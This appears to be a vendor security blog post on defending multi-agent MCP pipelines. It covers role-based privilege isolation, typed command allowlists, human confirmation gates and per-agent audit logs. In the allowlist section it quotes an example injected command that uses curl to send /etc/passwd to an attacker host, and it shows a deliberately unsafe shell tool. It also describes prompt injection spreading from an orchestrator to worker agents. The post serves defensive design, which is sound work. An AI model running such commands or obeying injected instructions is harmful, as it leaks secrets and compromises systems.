Security Architecture · 2026-06-03

Building a multi-agent MCP pipeline that doesn't trust itself: security isolation between agents

The first thing most teams wire up in a multi-agent MCP pipeline is agent identity verification: prove this message came from your orchestrator. It's the right instinct, but it solves only part of the problem. An orchestrator that is itself compromised, whether through direct or indirect prompt injection or through tool poisoning, will produce verified, signed messages that instruct worker agents to take harmful actions. The signature is genuine. The instruction is malicious. Identity verification stops impersonation; it does nothing to stop propagation once a single agent in the pipeline is compromised. This post is about what does: privilege isolation, command allowlists, and confirmation gates, the three-layer security model for multi-agent MCP pipelines.

TL;DR

Identity ≠ trust. A verified message from a compromised orchestrator is still a malicious instruction. Treat all upstream agent messages as untrusted input regardless of how they are signed.
Privilege isolation by role. Orchestrators coordinate; workers execute. Each worker should hold only the permissions its assigned task needs, and never enough to carry out another worker's job directly.
Command allowlists on cross-agent tools. Workers expose a narrow, explicitly typed API to the orchestrator — not a general run_command surface. Every parameter is validated server-side, not just passed through.
Confirmation gates on high-sensitivity operations. Any action that is irreversible (delete, publish, send, deploy) requires an out-of-band confirmation before a worker executes it — even if the instruction arrived from a verified orchestrator.
Audit trail per agent. Each agent logs what instructions it received and from what source, independent of the orchestrator's own log. An orchestrator that has been injected will not accurately report its own compromise in its logs.

Why compromise propagates across agent boundaries

Consider a three-agent pipeline: an orchestrator agent reads and routes user requests, a build-runner agent executes CI commands, and a deploy agent pushes to production. The orchestrator issues tool calls to the workers. The workers verify that instructions arrive over the authenticated channel. Everyone trusts the orchestrator.

Now consider what happens when the orchestrator processes a malicious document — a source file with an injected comment block, an email with payload instructions hidden in metadata, a web page with an invisible prompt in a CSS comment. The orchestrator's model interprets those instructions. It is now a compromised process with the ability to issue verified, authenticated instructions to both workers. The build-runner will happily run the injected build command. The deploy agent will push the injected artifact. The identity verification between agents was real; it just proved that the orchestrator sent the message, not that the orchestrator hadn't been manipulated into sending it.

This is the agent-to-agent compromise propagation problem. Identity-based trust models are necessary but not sufficient. The missing layer is behavioral: even a message from a verified source must be checked against what that source is allowed to ask for.
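One way to picture the behavioral layer is as a second check that runs only after the identity check has passed. The sketch below is illustrative, not a reference implementation: `AgentMessage`, `POLICY`, and `authorize` are hypothetical names, and the signature check is reduced to a boolean field so the example stays self-contained.

```typescript
// Hypothetical message shape. `signatureValid` stands in for a real JWT/mTLS check.
interface AgentMessage {
  senderId: string;
  signatureValid: boolean;
  tool: string;
}

// Hypothetical per-sender policy: which tools each verified sender may request.
const POLICY = new Map<string, ReadonlySet<string>>([
  ["orchestrator", new Set(["run_build_script", "stage_deploy"])],
]);

type Decision = { allowed: true } | { allowed: false; reason: string };

function authorize(msg: AgentMessage): Decision {
  // Identity check: stops impersonation, nothing more.
  if (!msg.signatureValid) {
    return { allowed: false, reason: "unverified sender" };
  }
  // Behavioral check: may this sender ask for this tool at all?
  const allowedTools = POLICY.get(msg.senderId);
  if (!allowedTools || !allowedTools.has(msg.tool)) {
    return { allowed: false, reason: `${msg.senderId} may not request ${msg.tool}` };
  }
  return { allowed: true };
}

// A genuinely signed message from an injected orchestrator asking for a tool
// outside its policy is refused; a normal request passes.
const injected = authorize({ senderId: "orchestrator", signatureValid: true, tool: "run_command" });
const normal = authorize({ senderId: "orchestrator", signatureValid: true, tool: "run_build_script" });
```

The point of the sketch is the ordering: a valid signature is a precondition for the policy lookup, never a substitute for it.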

The attacker's path through a trusted pipeline. In a system where workers fully trust the orchestrator, the blast radius of a single injection equals the union of all worker permissions. An orchestrator managing a build-runner, a database agent, and a notification agent, each of which accepts any instruction because it was issued by the verified orchestrator, can in principle exfiltrate any database row, execute any shell command, and send any notification to any target. The attacker only needs to compromise one agent, the orchestrator, to reach all of them.

Layer 1: Privilege isolation by agent role

The first layer is structural: no agent should have more privilege than its assigned role requires, and no agent's privilege set should overlap with another agent's in a way that enables lateral movement.

In practice, this means two things. First, each MCP server tool is scoped to what its agent actually needs — not what might be convenient to have. A build-runner agent that needs to run npm test should not also have a shell tool that accepts arbitrary commands. A database agent that needs to query audit logs should not also have tools that insert or delete rows. The SkillAudit permissions axis measures this directly: every capability declared in the manifest that cannot be traced to a specific tool's documented purpose is flagged as an over-permission finding.

Second, worker agents should not be able to fulfill each other's instructions without routing through the orchestrator. If the build-runner can directly invoke the deploy agent's tools, then compromising the build-runner gives you deploy access. The correct model is:

User request → Orchestrator
                 │
                 ├─[build instructions]──→ Build-runner MCP server
                 │                           (tools: run_tests, run_lint, get_coverage)
                 │                           (no deploy tools)
                 │
                 └─[deploy instructions]──→ Deploy MCP server
                                             (tools: stage_artifact, promote_to_prod)
                                             (no build tools, no shell access)

Not this:

User request → Orchestrator → Build-runner → Deploy server  (lateral move)

Each worker's MCP server manifest declares only what its role requires. No cross-agent shortcuts. The orchestrator is the only node that has connections to multiple workers, and even the orchestrator does not have permissions to execute what the workers execute; it only has permission to instruct them. If a worker is compromised, the blast radius is limited to what that one worker can do, not the union of what all workers can do. If the orchestrator is compromised, the attacker is limited to the operations each worker chooses to expose, which is what the next two layers constrain.
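The effect of a lateral connection can be checked mechanically. The following is a rough sketch under stated assumptions: `AgentNode`, `reachableTools`, and the topology maps are hypothetical, and the tool names are taken from the diagram above. It walks the call graph from a compromised node and collects every tool an attacker could reach from there.

```typescript
// Hypothetical topology description: the tools each node exposes and
// the nodes it can call directly.
interface AgentNode {
  tools: string[];
  canCall: string[];
}

// Tools reachable after compromising `start`: the node's own tools
// plus the tools of every node reachable from it.
function reachableTools(topology: Map<string, AgentNode>, start: string): Set<string> {
  const seen = new Set<string>();
  const tools = new Set<string>();
  const queue: string[] = [start];
  while (queue.length > 0) {
    const id = queue.shift() as string;
    if (seen.has(id)) continue;
    seen.add(id);
    const node = topology.get(id);
    if (!node) continue;
    node.tools.forEach((t) => tools.add(t));
    queue.push(...node.canCall);
  }
  return tools;
}

const buildTools = ["run_tests", "run_lint", "get_coverage"];

// Workers connect to nothing; only the orchestrator has outbound connections.
const isolated = new Map<string, AgentNode>([
  ["orchestrator", { tools: [], canCall: ["build", "deploy"] }],
  ["build", { tools: buildTools, canCall: [] }],
  ["deploy", { tools: ["stage_artifact", "promote_to_prod"], canCall: [] }],
]);

// Same agents, but the build-runner can call the deploy server directly.
const lateral = new Map(isolated).set("build", { tools: buildTools, canCall: ["deploy"] });

const isolatedBuildReach = reachableTools(isolated, "build");
const lateralBuildReach = reachableTools(lateral, "build");
```

In the isolated topology a compromised build-runner reaches only its own three tools; with the lateral connection it also reaches `promote_to_prod`. In this sketch the orchestrator still reaches every tool the workers expose, so what those tools accept determines what a compromised orchestrator can actually do.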

Layer 2: Command allowlists for cross-agent tool calls

The second layer is API design: the tools a worker exposes to the orchestrator should be typed, limited, and validated server-side — not a general command-execution surface.

The most common mistake is a build-runner agent that exposes a run_command tool with a single string parameter:

// DANGEROUS — orchestrator can inject arbitrary shell commands
const runCommand = server.tool("run_command", {
  command: z.string().describe("Shell command to run"),
}, async ({ command }) => {
  const output = await execa(command, { shell: true });
  return { content: [{ type: "text", text: output.stdout }] };
});

When the orchestrator is clean, run_command receives calls like "npm test". When the orchestrator is injected, it receives "curl https://attacker.example/exfil -d @/etc/passwd". The worker faithfully executes it. No validation in the worker catches it because the tool was designed to accept any string.

The safe version exposes typed operations that correspond to specific build tasks, validated server-side against an explicit allowlist:

// SAFE: restricted to a typed allowlist of build operations
const ALLOWED_SCRIPTS = new Set(["test", "lint", "build", "type-check"]);
const ROOT = path.resolve(PROJECT_ROOT);  // normalized absolute project root

const runBuildScript = server.tool("run_build_script", {
  script: z.enum(["test", "lint", "build", "type-check"])
    .describe("npm script to run; must be one of the allowed values"),
  working_directory: z.string().regex(/^[a-zA-Z0-9_\-\/\.]+$/)
    .describe("Relative path under project root (no shell metacharacters)"),
}, async ({ script, working_directory }) => {
  // Double-check even though zod should catch this
  if (!ALLOWED_SCRIPTS.has(script)) {
    throw new Error(`Disallowed script: ${script}`);
  }

  // The regex still permits ".." and a leading "/", so resolve the path
  // and confirm it stays inside the project root
  const cwd = path.resolve(ROOT, working_directory);
  if (cwd !== ROOT && !cwd.startsWith(ROOT + path.sep)) {
    throw new Error(`Working directory escapes project root: ${working_directory}`);
  }

  // Use array form of execa: no shell expansion, no metacharacters
  const output = await execa("npm", ["run", script], {
    cwd,
    shell: false,  // critical: no shell, so no injection
  });
  return { content: [{ type: "text", text: output.stdout }] };
});

The key differences: the allowed values are a closed enum defined in the worker's code, not a string passed in from outside. The shell flag is explicitly false, so even if injected text somehow arrived as a valid enum value, it would not be interpreted as a shell command. The working directory is validated against a character allowlist that excludes shell metacharacters. Because that allowlist still permits ".." segments and a leading "/", the handler also resolves the path and rejects anything that lands outside the project root.

This design means that a compromised orchestrator can only ask the build-runner to run test, lint, build, or type-check. It cannot make the build-runner do anything else, regardless of how the injection is worded. The worker's security posture is defined by the worker's code, not by the orchestrator's behavior. This is the correct trust model: an agent's security boundary is what it enforces about its own inputs, not what other agents promise to send it.

Validate as if the sender is adversarial. The rule is simple: every worker validates its tool call arguments exactly as it would validate user input from an untrusted external source. It doesn't matter that the call came from a verified orchestrator. A compromised orchestrator is an adversarial sender. If your worker would sanitize a URL from a web form, it should sanitize a URL from the orchestrator too — same code path, same checks.
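A minimal sketch of the "same code path, same checks" rule, assuming a worker that fetches artifacts by URL. The names `ALLOWED_HOSTS`, `validateFetchUrl`, `handleWebForm`, and `handleOrchestratorCall` are hypothetical, as is the host `artifacts.example.com`; only the standard `URL` class is relied on.

```typescript
// Hypothetical allowlist of hosts this worker is willing to fetch from.
const ALLOWED_HOSTS = new Set(["artifacts.example.com"]);

// One validator for every caller. It takes no "source" parameter, so there
// is no switch that could relax the checks for a verified orchestrator.
function validateFetchUrl(raw: string): URL {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    throw new Error("not a valid absolute URL");
  }
  if (url.protocol !== "https:") {
    throw new Error(`scheme not allowed: ${url.protocol}`);
  }
  if (url.username !== "" || url.password !== "") {
    throw new Error("credentials in URL are not allowed");
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    throw new Error(`host not allowlisted: ${url.hostname}`);
  }
  return url;
}

// Untrusted web form input and orchestrator tool arguments share the validator.
function handleWebForm(input: string): string {
  return validateFetchUrl(input).href;
}

function handleOrchestratorCall(args: { url: string }): string {
  return validateFetchUrl(args.url).href;
}
```

Leaving the caller's identity out of the validator's signature is a deliberate choice in this sketch: if the function cannot see who is asking, it cannot be talked into trusting them.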

Layer 3: Confirmation gates for high-sensitivity operations

The third layer addresses irreversibility. Some operations — sending notifications, publishing artifacts, deploying to production, deleting records, issuing API keys — cannot be undone once executed. For these operations, the correct architecture is a confirmation gate: a step between instruction and execution that requires explicit out-of-band authorization.

A confirmation gate is not the same as a permission check. A permission check asks whether the caller has the right to perform the operation. A confirmation gate asks whether this specific instance of the operation has been explicitly authorized at this point in time, by a human or policy, independent of the orchestrator's instruction chain. For state-modifying operations the distinction matters enormously: an orchestrator with execute permission can issue a deploy instruction, but the confirmation gate ensures that a human (or a deterministic approval policy) sees the full deploy parameters before the deploy agent acts on them.

The simplest form of a confirmation gate for an automated pipeline is a two-step tool design on the worker side:

// Step 1: stage the deploy — returns a confirmation token
const stageDeploy = server.tool("stage_deploy", {
  artifact_id: z.string().uuid(),
  target_env: z.enum(["staging", "production"]),
}, async ({ artifact_id, target_env }) => {
  const token = crypto.randomUUID();
  const expires = Date.now() + 5 * 60 * 1000; // 5-minute window

  await db.run(
    `INSERT INTO pending_deploys (token, artifact_id, target_env, expires_at, status)
     VALUES (?, ?, ?, ?, 'pending')`,
    [token, artifact_id, target_env, expires]
  );

  // Notify human approver out-of-band (Slack, PagerDuty, webhook)
  await notifyApprover({ token, artifact_id, target_env });

  return {
    content: [{ type: "text", text: JSON.stringify({
      status: "staged",
      confirmation_token: token,
      message: "Deploy staged — awaiting human approval via notification channel",
    }) }]
  };
});

// Step 2: execute only with a valid, unexpired, human-approved token
const executeDeploy = server.tool("execute_deploy", {
  confirmation_token: z.string().uuid(),
}, async ({ confirmation_token }) => {
  const deploy = await db.get(
    `SELECT * FROM pending_deploys
     WHERE token = ? AND status = 'approved' AND expires_at > ?`,
    [confirmation_token, Date.now()]
  );

  if (!deploy) {
    throw new Error("Invalid, expired, or unapproved confirmation token");
  }

  await markUsed(deploy.token);
  return await runDeploy(deploy.artifact_id, deploy.target_env);
});

The orchestrator can call stage_deploy freely — the stage step only writes a pending record and sends a notification. It cannot call execute_deploy successfully without a token that a human approved in the notification channel. An injected orchestrator that calls execute_deploy with a forged or valid-but-unapproved token gets an error. The confirmation status is set by the human approval webhook, not by the orchestrator.

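The 5-minute expiry matters: it bounds how long a staged or approved deploy stays actionable, so a stale approval cannot be executed hours later. Replay of an already-executed token is prevented separately, by marking the token used. Each staged deploy generates a fresh token with a short window, and because the artifact and target environment are stored with the token at stage time, an approved token cannot be redirected to a different deploy.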
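The approval side of the gate is described above but not shown. Here is one possible shape for it, as an in-memory sketch: `DeployGate` and its methods are hypothetical, a `Map` stands in for the `pending_deploys` table, and the token is a counter placeholder where real code would use `crypto.randomUUID()`. It also folds the status check and the "mark used" step into a single operation, which a database-backed version would likely want to do atomically as well.

```typescript
type Status = "pending" | "approved" | "used";

interface PendingDeploy {
  artifactId: string;
  targetEnv: "staging" | "production";
  expiresAt: number; // epoch milliseconds
  status: Status;
}

class DeployGate {
  private readonly pending = new Map<string, PendingDeploy>();
  private counter = 0;

  // Called by the worker's stage tool. `now` is passed in to keep the sketch testable.
  stage(artifactId: string, targetEnv: PendingDeploy["targetEnv"], now: number): string {
    const token = `token-${++this.counter}`; // placeholder, not a secure token
    this.pending.set(token, {
      artifactId,
      targetEnv,
      expiresAt: now + 5 * 60 * 1000,
      status: "pending",
    });
    return token;
  }

  // Called only from the human approval webhook, never exposed as an MCP tool.
  approve(token: string, now: number): boolean {
    const deploy = this.pending.get(token);
    if (!deploy || deploy.status !== "pending" || deploy.expiresAt <= now) return false;
    deploy.status = "approved";
    return true;
  }

  // Check and claim in one step so an approved token can be executed only once.
  claim(token: string, now: number): PendingDeploy | null {
    const deploy = this.pending.get(token);
    if (!deploy || deploy.status !== "approved" || deploy.expiresAt <= now) return null;
    deploy.status = "used";
    return deploy;
  }
}

const gate = new DeployGate();
const t0 = 1000000;
const token = gate.stage("artifact-1", "production", t0);
const beforeApproval = gate.claim(token, t0 + 1000); // unapproved: refused
const approved = gate.approve(token, t0 + 2000);     // human approves
const firstClaim = gate.claim(token, t0 + 3000);     // approved: executes once
const replay = gate.claim(token, t0 + 4000);         // already used: refused
```

Since the stage step returns the token to the orchestrator, knowing the token should not be enough to approve it. The sketch assumes the webhook that calls `approve` authenticates the human approver by some separate means.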

Independent audit trails

A compromised orchestrator will not accurately log its own compromise. If the only audit trail is the orchestrator's log, then a post-incident investigation starts from a potentially false picture of what the orchestrator did and why. Each worker should maintain its own append-only log of what instructions it received and from what authenticated source:

// Worker-side audit middleware — runs on every tool call before dispatch
server.use(async (context, next) => {
  const entry = {
    ts: new Date().toISOString(),
    tool: context.tool_name,
    caller_id: context.authenticated_caller_id,  // from verified JWT/mTLS
    args_hash: sha256(JSON.stringify(context.arguments)),
    args_preview: truncate(JSON.stringify(context.arguments), 200),
  };

  // Write to worker-local append-only log — does NOT pass through orchestrator
  await fs.appendFile(WORKER_AUDIT_LOG, JSON.stringify(entry) + "\n");

  return next(context);
});

The audit log records the arguments hash alongside a preview. This means that if a compromised orchestrator sent an unusual instruction, the worker's own log contains evidence of what was actually received — independent of anything the orchestrator recorded. When investigating a security incident in a multi-agent pipeline, start by comparing the orchestrator's outbound instruction log against each worker's inbound instruction log. Discrepancies reveal injection points.
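The log comparison can be sketched as a multiset difference over (tool, arguments hash) pairs. The code below is an assumption-laden illustration: `LogEntry`, `subtract`, and `diffLogs` are hypothetical, and it presumes the orchestrator's outbound log records a hash computed the same way as the worker's `args_hash` (same serialization, same key order).

```typescript
// Minimal entry shape, mirroring the tool and hash fields the worker records.
interface LogEntry {
  tool: string;
  argsHash: string;
}

interface LogDiff {
  receivedButNotReported: LogEntry[]; // present only in the worker's log
  reportedButNotReceived: LogEntry[]; // present only in the orchestrator's log
}

const keyOf = (e: LogEntry): string => `${e.tool}:${e.argsHash}`;

// Multiset difference a - b: repeated identical calls are counted, not collapsed.
function subtract(a: LogEntry[], b: LogEntry[]): LogEntry[] {
  const counts = new Map<string, number>();
  b.forEach((e) => counts.set(keyOf(e), (counts.get(keyOf(e)) ?? 0) + 1));
  return a.filter((e) => {
    const remaining = counts.get(keyOf(e)) ?? 0;
    if (remaining > 0) {
      counts.set(keyOf(e), remaining - 1);
      return false; // matched by an entry in b
    }
    return true; // no counterpart in b
  });
}

function diffLogs(orchestratorOutbound: LogEntry[], workerInbound: LogEntry[]): LogDiff {
  return {
    receivedButNotReported: subtract(workerInbound, orchestratorOutbound),
    reportedButNotReceived: subtract(orchestratorOutbound, workerInbound),
  };
}

// The orchestrator reports one call; the worker actually received two.
const orchestratorLog: LogEntry[] = [{ tool: "run_build_script", argsHash: "aaa" }];
const workerLog: LogEntry[] = [
  { tool: "run_build_script", argsHash: "aaa" },
  { tool: "stage_deploy", argsHash: "bbb" },
];
const diff = diffLogs(orchestratorLog, workerLog);
```

Entries in `receivedButNotReported` are the ones to look at first: calls the worker saw that the orchestrator's own log does not account for.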

Threat model summary: who can do what, even when compromised

The three-layer model constrains what a compromised agent can do. Here is the threat model with and without the layers applied:

Compromised agent	Without isolation	With all three layers
Orchestrator	Full blast radius: can instruct all workers to execute any operation they support	Limited to allowlisted tool inputs per worker; irreversible actions require out-of-band human confirmation
Build-runner worker	Can execute arbitrary shell if `run_command` tool exists; can issue instructions to other workers if directly connected	Can only run allowed scripts; no direct connections to other workers; no deploy or DB access
Deploy worker	Can deploy arbitrary artifacts to production without review	Stage step records intent; execute step requires human-approved token; each deploy logged independently
Any worker receiving injected content	May relay injected instructions to orchestrator or other workers	Worker validates its own inputs; injected content in tool outputs is framed as untrusted data, not instructions

Applying SkillAudit's six axes to multi-agent pipelines

Multi-agent pipelines involve multiple MCP servers, and each one should be audited independently. A build-runner server with a run_command-style tool is a high-severity Permissions finding — the manifest may declare only fs:exec, but the tool implementation grants the orchestrator the ability to run any command. SkillAudit's LLM-probe axis is particularly relevant here: the probe sends adversarially crafted orchestrator-style instructions to the tool and checks whether the worker executes them without validation. A server that passes static analysis but fails the LLM probe on a run_command tool will show a Security axis regression between scans.

The Credentials axis measures whether any worker inadvertently leaks credentials into tool outputs — a particular risk when workers operate on documents or tool outputs that may contain injected instructions asking the worker to echo its environment variables or configuration. See the ambient token problem for the credential-selection variant of this attack.

For teams building multi-agent pipelines: audit each worker server independently and treat each worker's SkillAudit grade as a per-component quality gate in your CI pipeline. A high-grade orchestrator running on top of a low-grade worker produces a low-grade pipeline. The weakest link sets the effective security posture of the whole system.
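As a rough illustration of the weakest-link rule in a CI gate, the sketch below takes the worst component grade as the pipeline grade. The letter scale, `pipelineGrade`, and `passesGate` are hypothetical; SkillAudit's actual grade format and CI integration may look different.

```typescript
// Hypothetical letter grades, best to worst. The real grade format may differ.
const GRADE_ORDER = ["A", "B", "C", "D", "F"] as const;
type Grade = (typeof GRADE_ORDER)[number];

// The pipeline's effective grade is the worst grade among its components.
function pipelineGrade(components: Record<string, Grade>): Grade {
  const grades = Object.keys(components).map((name) => components[name]);
  if (grades.length === 0) throw new Error("no components to grade");
  return grades.reduce((worst, g) =>
    GRADE_ORDER.indexOf(g) > GRADE_ORDER.indexOf(worst) ? g : worst
  );
}

// CI gate: pass only if the weakest component meets the minimum grade.
function passesGate(components: Record<string, Grade>, minimum: Grade): boolean {
  return GRADE_ORDER.indexOf(pipelineGrade(components)) <= GRADE_ORDER.indexOf(minimum);
}

const components: Record<string, Grade> = {
  orchestrator: "A",
  "build-runner": "A",
  "deploy-agent": "D",
};
const effective = pipelineGrade(components);
const gateOk = passesGate(components, "B");
```

Here two A-grade components do not offset the D-grade deploy agent: the effective grade is D and the gate fails.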

Closing: the principle is simple, the implementation is careful

Multi-agent MCP pipelines are powerful precisely because they compose: an orchestrator that can direct specialists creates a system that is more capable than any single agent. The security implication of composability is that compromise also composes. The fix is not to avoid multi-agent architectures — it is to design them with the same defense-in-depth that applies to any distributed system where components can be individually compromised.

The three layers — privilege isolation by role, command allowlists per worker, confirmation gates on irreversible operations — are not novel security concepts. They are the standard toolkit: principle of least privilege, input validation at every boundary, human-in-the-loop for high-risk operations. What is novel is applying them consistently at the inter-agent boundary, where the mental model of "internal trusted call" makes them easy to skip. Don't skip them. Treat every agent message as untrusted input from the start, and your pipeline's security posture will be defined by each component's own defenses — not by the assumption that no component will ever be compromised.

Related reading: agent-to-agent security covers the trust boundary model in more detail; state manipulation security covers persistent server state as an additional cross-agent attack surface. For the individual MCP server security foundations each worker should meet, see the MCP server security checklist and the permissions checklist.
